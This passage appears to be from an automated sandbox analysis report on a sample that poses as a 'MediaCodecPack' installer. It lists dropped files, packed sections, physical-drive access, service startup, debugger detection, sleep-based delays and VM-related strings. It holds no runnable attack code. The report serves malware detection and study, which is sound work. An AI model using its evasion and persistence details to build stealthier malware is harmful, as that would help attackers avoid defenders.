                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1Jump to behavior
                    Source: newwork.exe.1.exeStatic file information: File size 3314669 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-VMCDM.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-8I59M.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-VMCDM.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-UJAIS.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-8I59M.tmp.1.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeUnpacked PE file: 3.2.mediacodecpack.exe.400000.0.unpack .aitt4:ER;.ajtt4:R;.aktt4:W;.rsrc:R;.altt4:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeUnpacked PE file: 3.2.mediacodecpack.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .aitt4
                    Source: mediacodecpack.exe.1.drStatic PE information: section name: .aitt4
                    Source: mediacodecpack.exe.1.drStatic PE information: section name: .ajtt4
                    Source: mediacodecpack.exe.1.drStatic PE information: section name: .aktt4
                    Source: mediacodecpack.exe.1.drStatic PE information: section name: .altt4
                    Source: is-UJAIS.tmp.1.drStatic PE information: section name: Shared
                    Source: is-JJJFI.tmp.1.drStatic PE information: section name: /4
                    Source: is-JJJFI.tmp.1.drStatic PE information: section name: /19
                    Source: is-JJJFI.tmp.1.drStatic PE information: section name: /35
                    Source: is-JJJFI.tmp.1.drStatic PE information: section name: /51
                    Source: is-JJJFI.tmp.1.drStatic PE information: section name: /63
                    Source: is-JJJFI.tmp.1.drStatic PE information: section name: /77
                    Source: is-JJJFI.tmp.1.drStatic PE information: section name: /89
                    Source: is-JJJFI.tmp.1.drStatic PE information: section name: /102
                    Source: is-JJJFI.tmp.1.drStatic PE information: section name: /113
                    Source: is-JJJFI.tmp.1.drStatic PE information: section name: /124
                    Source: MediaCodecPack.exe.3.drStatic PE information: section name: .aitt4
                    Source: MediaCodecPack.exe.3.drStatic PE information: section name: .ajtt4
                    Source: MediaCodecPack.exe.3.drStatic PE information: section name: .aktt4
                    Source: MediaCodecPack.exe.3.drStatic PE information: section name: .altt4
                    Source: sqlite3.dll.3.drStatic PE information: section name: /4
                    Source: sqlite3.dll.3.drStatic PE information: section name: /19
                    Source: sqlite3.dll.3.drStatic PE information: section name: /35
                    Source: sqlite3.dll.3.drStatic PE information: section name: /51
                    Source: sqlite3.dll.3.drStatic PE information: section name: /63
                    Source: sqlite3.dll.3.drStatic PE information: section name: /77
                    Source: sqlite3.dll.3.drStatic PE information: section name: /89
                    Source: sqlite3.dll.3.drStatic PE information: section name: /102
                    Source: sqlite3.dll.3.drStatic PE information: section name: /113
                    Source: sqlite3.dll.3.drStatic PE information: section name: /124
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0040994C push 00409989h; ret 1_2_00409981
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00483F88 push 00484096h; ret 1_2_0048408E
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax1_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004104E0 push ecx; mov dword ptr [esp], edx1_2_004104E5
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00412928 push 0041298Bh; ret 1_2_00412983
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00494CAC push ecx; mov dword ptr [esp], ecx1_2_00494CB1
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0040CE38 push ecx; mov dword ptr [esp], edx1_2_0040CE3A
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004592D0 push 00459314h; ret 1_2_0045930C
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0040F398 push ecx; mov dword ptr [esp], edx1_2_0040F39A
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00443440 push ecx; mov dword ptr [esp], ecx1_2_00443444
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00485678 push ecx; mov dword ptr [esp], ecx1_2_0048567D
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004517F8 push 0045182Bh; ret 1_2_00451823
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004519BC push ecx; mov dword ptr [esp], eax1_2_004519C1
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00477B08 push ecx; mov dword ptr [esp], edx1_2_00477B09
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00419C28 push ecx; mov dword ptr [esp], ecx1_2_00419C2D
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0045FD1C push ecx; mov dword ptr [esp], ecx1_2_0045FD20
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00409E4F push ds; ret 1_2_00409E50
                    Source: mediacodecpack.exe.1.drStatic PE information: section name: .aitt4 entropy: 7.74249878627152
                    Source: MediaCodecPack.exe.3.drStatic PE information: section name: .aitt4 entropy: 7.74249878627152

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02D0E8A7
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-UJAIS.tmpJump to dropped file
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeFile created: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-JJJFI.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\is-P1HNB.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile created: C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile created: C:\ProgramData\MediaCodecPack\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-NDPJ4.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-8I59M.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-VMCDM.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\sqlite3.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile created: C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile created: C:\ProgramData\MediaCodecPack\sqlite3.dllJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive03_2_02D0E8A7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_00401C49 StartServiceCtrlDispatcherA,3_2_00401C49
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004241DC IsIconic,SetActiveWindow,SetFocus,1_2_004241DC
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00424194 IsIconic,SetActiveWindow,1_2_00424194
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418384
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042285C
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00417598 IsIconic,GetCapture,1_2_00417598
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_0048393C
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00417CCE IsIconic,SetWindowPos,1_2_00417CCE
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CD0
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F118
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_02D0E9AB
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeWindow / User API: threadDelayed 5240Jump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeWindow / User API: threadDelayed 4688Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-UJAIS.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-JJJFI.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\is-P1HNB.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-NDPJ4.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-8I59M.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-VMCDM.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5966
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeAPI coverage: 4.8 %
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 7424Thread sleep count: 5240 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 7424Thread sleep time: -10480000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 6008Thread sleep time: -1140000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 7424Thread sleep count: 4688 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 7424Thread sleep time: -9376000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,1_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose,1_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpCode function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463CDC
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B78
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeThread delayed: delay time: 60000Jump to behavior
                    Source: mediacodecpack.exe, 00000003.00000002.2572840058.00000000009D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@?6
                    Source: mediacodecpack.exe, 00000003.00000002.2576046673.0000000003360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeAPI call chain: ExitProcess graph end nodegraph_0-6763
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeAPI call chain: ExitProcess graph end nodegraph_3-61177
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmpProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_3-60868
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D13A08 _memset,IsDebuggerPresent,3_2_02D13A08
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 3_2_02D1E6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02D1E6BE
